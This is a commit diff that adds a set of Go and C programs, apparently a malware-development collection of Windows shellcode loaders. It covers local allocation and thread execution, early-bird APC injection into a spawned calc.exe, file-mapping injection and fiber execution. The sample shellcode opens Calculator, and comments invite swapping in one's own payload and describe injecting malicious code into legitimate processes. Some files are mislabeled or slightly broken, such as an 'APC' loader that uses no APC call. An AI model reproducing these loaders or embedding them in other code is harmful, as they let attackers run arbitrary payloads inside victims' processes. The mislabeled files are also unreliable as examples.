Add files via upload

APC_Injection/APC_Injection.go

@@ -0,0 +1,53 @@
+package main
+
+import (
+	"fmt"
+	"syscall"
+	"unsafe"
+)
+const (
+	// it can be like 0x2000 but itook this from uhh rubyredops cuz i was lazy to find it lol
+	MEM_COMMIT = 0x00001000
+	MEM_RESERVE = 0x00002000
+)
+// start calc.exe (Will start calculator.exe), example shellcode, replace with yours
+var shellcode = []byte{
+	0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
+	0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
+	0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
+	0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
+	0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
+	0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
+	0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3,
+}
+
+func main() {
+	Kernel32 := syscall.NewLazyDLL("kernel32.dll")
+	VirtualAllocation := Kernel32.NewProc("VirtualAlloc")
+	VirtualProtect := Kernel32.NewProc("VirtualProtect")
+	CreateThread := Kernel32.NewProc("CreateThread")
+	WaitForSingleObject := Kernel32.NewProc("WaitForSingleObject")
+
+	addr, _, err := VirtualAllocation.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, syscall.PAGE_READWRITE)
+	if addr == 0 {
+		fmt.Printf("[!] VirtualAlloc Failed With Error: %v\n", err)
+		return
+	}
+    //copy is like memcpy btw or thats what i think cuz its similar cant lie :shrug:
+	copy((*[1 << 30]byte)(unsafe.Pointer(addr))[:], shellcode) 
+
+	var oldprotect uintptr
+	ret, _, err := VirtualProtect.Call(addr, uintptr(len(shellcode)), syscall.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldprotect)))
+	if ret == 0 {
+		fmt.Printf("[!] VirtualProtect Failed With Error: %v\n", err)
+		return
+	}
+
+	thread, _, err := CreateThread.Call(0, 0, addr, 0, 0, 0)
+	if thread == 0 {
+		fmt.Printf("[!] CreateThread Failed With Error: %v\n", err)
+		return
+	}
+
+	WaitForSingleObject.Call(thread, syscall.INFINITE)
+}

Early_Bird_APC_Injection/Early_Bird_APC_Injection.go

@@ -0,0 +1,128 @@
+package main
+
+import (
+	"fmt"
+	"syscall"
+	"unsafe"
+)
+
+var (
+	kernel32               = syscall.NewLazyDLL("kernel32.dll")
+	ntdll                  = syscall.NewLazyDLL("ntdll.dll")
+	VirtualAllocEx         = kernel32.NewProc("VirtualAllocEx")
+	VirtualProtectEx       = kernel32.NewProc("VirtualProtectEx")
+	WriteProcessMemory     = kernel32.NewProc("WriteProcessMemory")
+	CreateProcessA         = kernel32.NewProc("CreateProcessA")
+	CreateRemoteThread     = kernel32.NewProc("CreateRemoteThread")
+	QueueUserAPC           = kernel32.NewProc("QueueUserAPC")
+	DebugActiveProcessStop = kernel32.NewProc("DebugActiveProcessStop")
+	CloseHandle            = kernel32.NewProc("CloseHandle")
+	SleepEx                = kernel32.NewProc("SleepEx")
+
+	Startinf syscall.StartupInfo
+	ProcInfo syscall.ProcessInformation
+)
+
+const (
+	MEM_COMMIT             = 0x1000
+	MEM_RESERVE            = 0x2000
+	PAGE_READWRITE         = 0x04
+	PAGE_EXECUTE_READWRITE = 0x40
+	DEBUG_PROCESS          = 0x00000001
+	INFINITE               = 0xFFFFFFFF
+)
+
+// Shellcode to start calc.exe
+var ShellCode = []byte{
+	0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
+	0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
+	0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
+	0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
+	0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
+	0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
+	0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3,
+}
+
+func main() {
+	/*
+    inject malicious code into legitimate processes. inserting malicious code into a process in its early stages
+	*/
+	cl := "C:\\Windows\\System32\\calc.exe"
+
+	ret, _, err := CreateProcessA.Call(
+		0,
+		uintptr(unsafe.Pointer(syscall.StringBytePtr(cl))),
+		0,
+		0,
+		0,
+		DEBUG_PROCESS,
+		0,
+		0,
+		uintptr(unsafe.Pointer(&Startinf)),
+		uintptr(unsafe.Pointer(&ProcInfo)),
+	)
+	if ret == 0 {
+		panic(fmt.Sprintf("CreateProcessA failed: %v", err))
+	}
+
+	hProcess := ProcInfo.Process
+	hThread := ProcInfo.Thread
+
+	addr, _, err := VirtualAllocEx.Call(
+		uintptr(hProcess),
+		0,
+		uintptr(len(ShellCode)),
+		MEM_COMMIT|MEM_RESERVE,
+		PAGE_READWRITE,
+	)
+	if addr == 0 {
+		panic(fmt.Sprintf("VirtualAllocEx failed: %v", err))
+	}
+
+	_, _, err = WriteProcessMemory.Call(
+		uintptr(hProcess),
+		addr,
+		uintptr(unsafe.Pointer(&ShellCode[0])),
+		uintptr(len(ShellCode)),
+		0,
+	)
+	if ret == 0 {
+		panic(fmt.Sprintf("WriteProcessMemory failed: %v", err))
+	}
+
+	var ldprotect uint32
+	ret, _, err = VirtualProtectEx.Call(
+		uintptr(hProcess),
+		addr,
+		uintptr(len(ShellCode)),
+		PAGE_EXECUTE_READWRITE,
+		uintptr(unsafe.Pointer(&ldprotect)),
+	)
+	if ret == 0 {
+		panic(fmt.Sprintf("VirtualProtectEx failed: %v", err))
+	}
+
+	ret, _, err = QueueUserAPC.Call(
+		addr,
+		uintptr(hThread),
+		0,
+	)
+	if ret == 0 {
+		panic(fmt.Sprintf("QueueUserAPC failed: %v", err))
+	}
+
+	ret, _, err = DebugActiveProcessStop.Call(uintptr(ProcInfo.ProcessId))
+	if ret == 0 {
+		panic(fmt.Sprintf("DebugActiveProcessStop failed: %v", err))
+	}
+
+	ret, _, err = CloseHandle.Call(uintptr(hProcess))
+	if ret == 0 {
+		panic(fmt.Sprintf("CloseHandle (process) failed: %v", err))
+	}
+
+	ret, _, err = CloseHandle.Call(uintptr(hThread))
+	if ret == 0 {
+		panic(fmt.Sprintf("CloseHandle (thread) failed: %v", err))
+	}
+}

Local_Mapping_Injection/Local_Mapping_Injection.go

@@ -0,0 +1,74 @@
+package main
+
+import (
+    "fmt"
+    "syscall"
+    "unsafe"
+)
+
+var (
+    kernel32              = syscall.NewLazyDLL("kernel32.dll")
+    CreateFileMappingW    = kernel32.NewProc("CreateFileMappingW")
+    MapViewOfFile         = kernel32.NewProc("MapViewOfFile")
+    CreateThread          = kernel32.NewProc("CreateThread")
+    WaitForSingleObject   = kernel32.NewProc("WaitForSingleObject")
+    CloseHandle           = kernel32.NewProc("CloseHandle")
+)
+
+func main() {
+    // start calc.exe
+    shellcode := []byte{
+        0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
+        0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
+        0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
+        0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
+        0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
+        0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
+        0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3,
+    }
+
+    fmt.Println("[+] Creating a mapping file")
+    hfile, _, err := CreateFileMappingW.Call(
+        uintptr(0xFFFFFFFFFFFFFFFF), // INVALID_HANDLE_VALUE
+        0,
+        syscall.PAGE_EXECUTE_READWRITE,
+        0,
+        uintptr(len(shellcode)),
+        0,
+    )
+    if hfile == 0 {
+        panic(fmt.Sprintf("[!] CreateFileMappingW Failed With Error: %v", err))
+    }
+
+    fmt.Println("[+] Mapping the file object")
+    mapaddr, _, err := MapViewOfFile.Call(
+        hfile,
+        syscall.FILE_MAP_WRITE|syscall.FILE_MAP_EXECUTE,
+        0,
+        0,
+        uintptr(len(shellcode)),
+    )
+    if mapaddr == 0 {
+        panic(fmt.Sprintf("[!] MapViewOfFile Failed With Error: %v", err))
+    }
+
+    fmt.Println("[+] Copying shellcode to mapped memory")
+    copy((*[276]byte)(unsafe.Pointer(mapaddr))[:], shellcode)
+
+    fmt.Println("[+] Creating a thread")
+    hthread, _, err := CreateThread.Call(
+        0,
+        0,
+        mapaddr,
+        0,
+        0,
+        0,
+    )
+    if hthread == 0 {
+        panic(fmt.Sprintf("[!] CreateThread Failed With Error: %v", err))
+    }
+
+    fmt.Println("[+] Thread Executed!!")
+    WaitForSingleObject.Call(hthread, syscall.INFINITE)
+    CloseHandle.Call(hthread)
+}

Local_Payload_Execution/Local_Payload_Execution.go

@@ -0,0 +1,62 @@
+package main
+
+import (
+    "fmt"
+    "unsafe"
+    "syscall"
+)
+
+var (
+    kernel32            = syscall.NewLazyDLL("kernel32.dll")
+    virtualalloc        = kernel32.NewProc("VirtualAlloc")
+    virtualprotect      = kernel32.NewProc("VirtualProtect")
+    createthread        = kernel32.NewProc("CreateThread")
+    waitforsingleobject = kernel32.NewProc("WaitForSingleObject")
+)
+
+const (
+    memCommit           = 0x00001000
+    memReserve          = 0x00002000
+    pageReadWrite       = 0x04
+    pageExecuteReadWrite = 0x40
+    infinite             = 0xFFFFFFFF
+)
+
+func main() {
+    shellcode := []byte{
+        0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
+        0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
+        0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
+        0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
+        0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
+        0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
+        0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3,
+    }
+
+    fmt.Println("[+] Memory Allocation Being Performed")
+    addr, _, err := virtualalloc.Call(0, uintptr(len(shellcode)), memCommit|memReserve, pageReadWrite)
+    if addr == 0 {
+        panic(fmt.Sprintf("[!] VirtualAlloc failed: %v", err))
+    }
+
+    fmt.Println("[+] Copying Shellcode To Target Memory")
+    for i, v := range shellcode {
+        *(*byte)(unsafe.Pointer(addr + uintptr(i))) = v
+    }
+
+    fmt.Println("[+] Changing Page Permissions")
+    var oldProtect uint32
+    _, _, err = virtualprotect.Call(addr, uintptr(len(shellcode)), pageExecuteReadWrite, uintptr(unsafe.Pointer(&oldProtect)))
+    if err != nil && err.(syscall.Errno) != 0 {
+        panic(fmt.Sprintf("[!] VirtualProtect failed: %v", err))
+    }
+
+    fmt.Println("[+] Thread Being Created")
+    thread, _, err := createthread.Call(0, 0, addr, 0, 0, 0)
+    if thread == 0 {
+        panic(fmt.Sprintf("[!] CreateThread failed: %v", err))
+    }
+
+    fmt.Println("[+] Shellcode Executed!")
+    waitforsingleobject.Call(thread, infinite)
+}

Payload_Execution_Fibers/Payload_Execution_Fibers.go

@@ -0,0 +1,25 @@
+package main
+
+/*
+#include "payload_exec_fibers.c"
+*/
+import "C"
+import (
+    "fmt"
+    "unsafe"
+)
+// Start Calc.exe
+var shellcode = []byte{
+    0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
+    0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
+    0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
+    0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
+    0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
+    0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
+    0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3,
+}
+
+func main() {
+    C.ExecSC((*C.uchar)(unsafe.Pointer(&shellcode[0])), C.size_t(len(shellcode)))
+    fmt.Println("[+] Shellcode Executed!")
+}

Payload_Execution_Fibers/payload_exec_fibers.c

@@ -0,0 +1,23 @@
+#include <windows.h>
+
+void ExecSC(const unsigned char* shellcode, size_t length) {
+    LPVOID allocmem = VirtualAlloc(NULL, length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (allocmem == NULL) {
+        ExitProcess(GetLastError());
+    }
+    memcpy(allocmem, shellcode, length);
+    DWORD oldProtect;
+    if (!VirtualProtect(allocmem, length, PAGE_EXECUTE_READ, &oldProtect)) {
+        VirtualFree(allocmem, 0, MEM_RELEASE);
+        ExitProcess(GetLastError());
+    }
+    HANDLE fiber = CreateFiber(0, (LPFIBER_START_ROUTINE)allocmem, NULL);
+    if (fiber == NULL) {
+        VirtualFree(allocmem, 0, MEM_RELEASE);
+        ExitProcess(GetLastError());
+    }
+    ConvertThreadToFiber(NULL);
+    SwitchToFiber(fiber);
+    DeleteFiber(fiber);
+    VirtualFree(allocmem, 0, MEM_RELEASE);
+}

Payload_Placement/Payload_Placement.go

@@ -0,0 +1,26 @@
+package main
+
+/*
+#include "Payload_Placement_Wrapper.c"
+*/
+import "C"
+import (
+    "fmt"
+    "unsafe"
+)
+
+// start calc.exe
+var shellcode = []byte{
+    0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
+    0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
+    0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
+    0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
+    0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
+    0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
+    0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3,
+}
+
+func main() {
+    C.ExecSC((*C.uchar)(unsafe.Pointer(&shellcode[0])), C.size_t(len(shellcode)))
+    fmt.Println("[+] Shellcode Executed!")
+}